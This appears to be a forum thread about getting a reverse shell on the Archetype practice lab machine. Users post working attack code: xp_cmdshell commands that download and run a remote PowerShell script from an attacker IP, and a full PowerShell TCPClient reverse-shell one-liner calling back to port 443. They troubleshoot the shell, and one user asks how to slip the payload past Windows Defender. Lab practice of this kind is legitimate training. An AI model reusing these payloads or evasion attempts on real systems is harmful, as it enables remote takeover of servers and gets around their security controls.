Archetype reverse shell

I get all the way to where I host a server on port 80 and get up a netcat on 443. I get the script and modify it with my IP and the correct port. I run the command: xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.124/shell.ps1\“);” and get a connection. But! There is nothing happening. If I press ENTER on the nc terminal I only get a # and nothing else. Anyone know what to do?

So I’m also having problems with a reverse shell. I tried a slightly different one: $client = New-Object System.Net.Sockets.TCPClient(“10.10.16.124”,443);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() but this gives the following error: IEX : At line:1 char:1 + $client = New-Object System.Net.Sockets.TCPClient(“10.10.15.172”,443) … + ~This script contains malicious content and has been blocked by your antivirus software. At line:1 char:1 + IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.172/sh … +~ + CategoryInfo : ParserError: (:slight_smile: [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand NULL I wonder if there’s been an update to the OS somewhere?

Save the script like this: $client = New-Object System.Net.Sockets.TCPClient(“your IP”,443); $stream = $client.GetStream(); [byte[]]$bytes = 0…65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "# "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close() This will make the connection, but no shell recieved.

Thanks - I still get the following though: “This script contains malicious content and has been blocked by your antivirus software.”

I requested a restart of the box when I got that message and after the restart it went through. Try it!

I’m having the same issue that my payload is picked by the antivirus software. I tried encoding the payload with metasploit but without success. Any idea how to bypass the Windows Defender?

What is weird is that it was working before. Maybe there was an update?

i have been receiving this error when i try to run a powershell with xp_cmdshell.

[-] ERROR(ARCHETYPE): Line 1: Incorrect syntax near ‘/’.

The command i run is:
xp_cmdshell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.55:8044/rev.ps1’)”

I’d appreciate any tips or nudges. Thank you.